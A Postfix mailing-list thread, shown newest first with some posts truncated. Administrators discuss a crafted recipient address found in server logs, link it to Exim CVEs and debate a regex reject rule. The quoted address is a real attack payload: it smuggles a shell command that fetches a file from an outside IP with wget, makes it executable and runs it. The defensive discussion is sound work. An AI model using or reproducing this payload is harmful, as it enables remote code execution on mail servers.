Re: [External] command injection by crafted recipient address

2020-03-13 Thread Wietse Venema
Joe Acquisto-j4:
> >>>
> > kris_h:
> >> Hey Wietse,
> >>
> >> thank you for this clarification.
> >>
> >> What do you think about using the reject-recipient /\$\{/-rule?
> >
> > As a temporary rule, it may have made sense when the Exim bug was new.
> >
> > As a permanent 'deny' rule, it won't

Re: [External] command injection by crafted recipient address

2020-03-13 Thread Joe Acquisto-j4
>>>
> kris_h:
>> Hey Wietse,
>>
>> thank you for this clarification.
>>
>> What do you think about using the reject-recipient /\$\{/-rule?
>
> As a temporary rule, it may have made sense when the Exim bug was new.
>
> As a permanent 'deny' rule, it won't block new exploits.
>
> Wietse

Re: [External] command injection by crafted recipient address

2020-03-13 Thread kris_h
> As a temporary rule, it may have made sense when the Exim bug was new.
> As a permanent 'deny' rule, it won't block new exploits.

yes, you're right, each PCRE-rule more is one more to be passed for each recipient...

Thanks
Kris

--
Sent from: http://postfix.1071664.n5.nabble.com/Postfi

Re: [External] command injection by crafted recipient address

2020-03-13 Thread Wietse Venema
kris_h:
> Hey Wietse,
>
> thank you for this clarification.
>
> What do you think about using the reject-recipient /\$\{/-rule?

As a temporary rule, it may have made sense when the Exim bug was new.

As a permanent 'deny' rule, it won't block new exploits.

Wietse

Re: [External] command injection by crafted recipient address

2020-03-13 Thread kris_h
Hey Wietse,

thank you for this clarification.

What do you think about using the reject-recipient /\$\{/-rule?

Kris

--
Sent from: http://postfix.1071664.n5.nabble.com/Postfix-Users-f2.html

Re: [External] command injection by crafted recipient address

2020-03-12 Thread Wietse Venema
Kevin A. McGrail:
>
> On 3/12/2020 4:40 PM, kris_h wrote:
> > root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost
>
> It's an exim exploit. See CVE-2019-15846.

The above is very similar to the Exim exploit for CVE-2019-10149 in https://www

Re: [External] command injection by crafted recipient address

2020-03-12 Thread kris_h
> It's an exim exploit. See CVE-2019-15846.

@KAM Thanks a lot for this really quick reply!

--
Sent from: http://postfix.1071664.n5.nabble.com/Postfix-Users-f2.html

Re: [External] command injection by crafted recipient address

2020-03-12 Thread Kevin A. McGrail
On 3/12/2020 4:40 PM, kris_h wrote:
> root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost

It's an exim exploit. See CVE-2019-15846.

Regards,
KAM

command injection by crafted recipient address

2020-03-12 Thread kris_h
Hey, I found this crazy recipient-address in my postfix-logs:

root+${run{x2Fbinx2Fsht-ctx22wgetx20103.11.228.92x2fssx20-Osxsx3bchmodx20x2bxx20sxsx3b.x2fsxsx22}}@localhost

seems that someone tries to download something with wget, then chmod 'x' and finally execute the downloaded crap

Is there a